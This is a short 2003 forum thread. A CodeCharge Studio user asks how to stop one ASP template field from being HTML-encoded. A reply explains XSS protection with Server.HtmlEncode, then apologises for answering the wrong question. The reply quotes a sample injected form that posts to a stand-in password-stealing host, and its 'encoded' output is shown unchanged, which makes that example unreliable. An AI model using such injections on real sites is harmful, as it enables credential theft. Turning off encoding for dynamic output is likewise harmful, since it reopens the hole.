rhonda
|
| Posted: 06/08/2003, 3:56 AM |
|
I am using Code charge studio. I have an asp form (and template) and all the data is being passed in htmlencoded format. I have a field that I do not want passed as htmlencoded. Is there a way to pass that field in a template as not htmlencoded????
I am creating a series of links dynamically in the asp page and I want them to show up in a select box in the html page but it is encoding them.
|
|
|
 |
DaveRexel
|
| Posted: 06/08/2003, 6:30 AM |
|
How do we Protect Against Cross Site Scripting?
Protecting against a Cross Site Scripting attack is relatively simple: simply use the Server.HtmlEncode method. Server.HtmlEncode takes a string and replace any characters that the browser will try to interpret with HTML encoding, so that the browser will print the characters to the screen. For example, if we call the Server.HtmlEncode method passing in:
</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">
The resulting string will be:
</form><form method="POST" action="www.hax0r.com/passwordstealer.asp">
To change our original code to use html encoding, we need to change the line that prints the value of errorMessage from <%=request.querystring("errorMessage")%> to <%=server.htmlencode(request.querystring("errormsg"))%>
Once again, sanitization of data that is passed back to the browser should be performed on all data that has passed from an insecure source (the client). We should also sanitize any data that comes from any source and is passed back to the browser, as a hacker could break into our database/file system, insert his code into the correct record/file, and compromise our Web site in that manner. For a good article on Cross Site Scripting attacks, see: The Cross Site Scripting FAQ.
|
|
|
|
DaveRexel
|
| Posted: 06/08/2003, 6:32 AM |
|
Etremeley sorry, I fired off the answer without lookimg for true problem
my apologies - must get some sleep soon
|
|
|
|
|
